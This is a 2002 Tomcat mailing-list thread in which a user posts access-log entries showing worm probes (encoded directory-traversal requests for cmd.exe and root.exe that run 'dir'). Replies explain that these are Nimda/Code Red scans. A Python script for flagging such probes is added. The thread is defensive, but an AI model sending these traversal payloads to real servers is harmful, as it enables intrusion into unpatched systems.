Posted to users@tomcat.apache.org by Laszlo Nadai <ln...@jnet1.com> on 2002/12/29 14:39:22 UTC

Tomcat log entries

I am fairly new to Tomcat, scripts, etc.
I found the following and similar entries in my access log file:

64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:15:00:17 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:18 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.160.45.159 - - [28/Dec/2002:16:01:56 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.160.45.159 - - [28/Dec/2002:16:01:58 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:00 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.160.45.159 - - [28/Dec/2002:16:02:04 -0800] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718
64.160.45.159 - - [28/Dec/2002:16:02:06 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:07 -0800] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:16:02:09 -0800] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721
64.160.45.159 - - [28/Dec/2002:16:02:10 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
64.165.213.97 - - [28/Dec/2002:16:38:16 -0800] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 618
64.165.213.97 - - [28/Dec/2002:16:38:20 -0800] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648
64.165.213.97 - - [28/Dec/2002:16:38:24 -0800] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648

Can someone tell me what someone else was trying to do?
Based on the log, should I change any settings in my config?

Thanks,
laszlo


-
[This E-mail scanned for viruses by declude AntiVirus Software]


--
To unsubscribe, e-mail:   <ma...@jakarta.apache.org>
For additional commands, e-mail: <ma...@jakarta.apache.org>


Re: Tomcat log entries

Posted by Bill Barker <wb...@wilshire.com>.
This is simply some Windows server that is infected with the Nimda Worm
looking for a new place to crawl to.  It only infects non-patched IIS
servers, so for Tomcat stand-alone or Apache, you can safely ignore it.



RE: Tomcat log entries

Posted by "Rob A. Augustinus" <de...@siulintao.net>.
These are typical 'code red' (afaik?) entries in your log.
Some infected server is still trying to infect your server,
not that it will be infected, but it will try for a certain
amount of times at least. You could create a valid link to
a null-sized file to handle it, which causes less load on
your system than a 404. Other than that, there's little
to be done about it (unless you can track down the admin
of that box, and tell him to fix his server).

Rob
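
A triage check for the probe requests in the log posted in this thread, as an added example that is not part of any poster's message: it re-joins the mail-wrapped entries, tags requests for cmd.exe/root.exe and the encoded ".." variants, and lists per source address any probe that was not rejected with a 4xx/5xx. The function names, tag names and the 192.0.2.10 entry are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Excerpt of the log above, wrapped as in the e-mail; the 192.0.2.10 entry is constructed.
SAMPLE = '''\
64.160.45.159 - - [28/Dec/2002:15:00:19 -0800] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687
64.160.45.159 - - [28/Dec/2002:15:00:20 -0800] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715
64.165.213.97 - - [28/Dec/2002:16:38:12 -0800] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 624
192.0.2.10 - - [28/Dec/2002:16:40:01 -0800] "GET
/index.jsp HTTP/1.0" 200 1024
'''

ENTRY = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) HTTP/[\d.]+" (\d{3}) (?:\d+|-)')

def parse(text):
    """Undo the mail line-wrapping, then return (ip, time, path, status) tuples."""
    flat = " ".join(text.split())
    return [(ip, when, path, int(st)) for ip, when, path, st in ENTRY.findall(flat)]

def classify(path):
    """Return the probe traits found in one request path (empty list = not a probe)."""
    tags = []
    if re.search(r"/(?:root|cmd)\.exe\?", path, re.I):
        tags.append("windows-shell")      # asks for cmd.exe or root.exe
    if re.search(r"%c[01]%[0-9a-f]{2}", path, re.I):
        tags.append("overlong-utf8")      # 0xC0/0xC1 never start valid UTF-8
    if re.search(rb"%[0-9a-f]{2}", unquote_to_bytes(path), re.I):
        tags.append("double-encoded")     # an escape survives one decode pass
    return tags

def summarize(text):
    """Per source IP: probe count, traits seen, and probes answered below 400."""
    report = defaultdict(lambda: {"probes": 0, "tags": set(), "answered": []})
    for ip, when, path, status in parse(text):
        if not (tags := classify(path)):
            continue
        row = report[ip]
        row["probes"] += 1
        row["tags"].update(tags)
        if status < 400:                  # served or redirected, not rejected
            row["answered"].append((when, path, status))
    return dict(report)

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An empty "answered" list for every address, as with the entries in this thread, means each probe was rejected; any entry there is the request to look at first.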
